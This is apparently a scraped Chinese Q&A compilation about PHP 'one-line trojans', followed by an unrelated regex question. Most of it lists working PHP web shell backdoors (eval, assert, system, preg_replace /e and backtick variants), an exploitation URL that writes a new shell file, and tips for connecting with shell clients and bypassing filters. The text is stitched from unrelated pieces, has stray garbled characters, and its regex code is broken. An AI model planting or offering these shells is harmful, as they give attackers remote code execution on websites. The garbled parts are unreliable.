php变形一句话

‘壹’ php一句话木马～呢

超级隐蔽的PHP后门：
<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马；
利用方法：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%%29%29};

执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用

‘贰’ 写一个PHP一句话木马密码为file

PHP一句话木马是一种利用PHP的eval函数执行任意代码的后门程序。一般格式为雹歼培：
<?php @eval ($_POST ['password']);?>

其中，password是连接木马时需要输入的密码，可以自定义。如果您想要写一个密码为file的一句话木马，那么可以这样写：
<?php @eval ($_POST ['file']);?>

请注意，这种木马非常源唯危险，可能导致网站被黑客入侵或破坏，请谨慎使用改橡。

‘叁’ 一个有意思的 PHP 一句话后门，怎么破

<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php

@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在
配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>

‘肆’ 使用php正则式去除字符串中最后一个斜杠及之后的内容

可以参考下面的两种方法：

1、var s = '一句话描/述(您的)/疑问/123一二三abc';

s.replace(/(.*)/{1}.*/, '$1'); //标准模式下，.*会自动匹配到最后一个位置

//输出 "一句话描/述(您的)/疑问"

2、$str = '一句话描/述(您的)疑问/123一二三abc';

$str = preg_replace('/(.*)/{1}([^/]*)/i', '$1', $str);

echo $str;

(4)php变形一句话扩展阅读：

PHP正则表达式中的参考函数：

pattern: 要搜索的模式，字符串类型。

subject：输入字符串。

match： 如果提供了参数matches，它将被填充为搜索结果,数据结构为一维数组。

flags: 可以设置为PREG_OFFSET_CAPTURE，使用搜索结果的第0个元素为匹配的字符串，第1个元素为对应的偏移量（位置）

offset: 搜索从目标字符串的起始位置开始匹配。

pattern：要搜索的模式。可以是一个字符串或字符串数组。

replacement：用于替换的字符串或字符串数组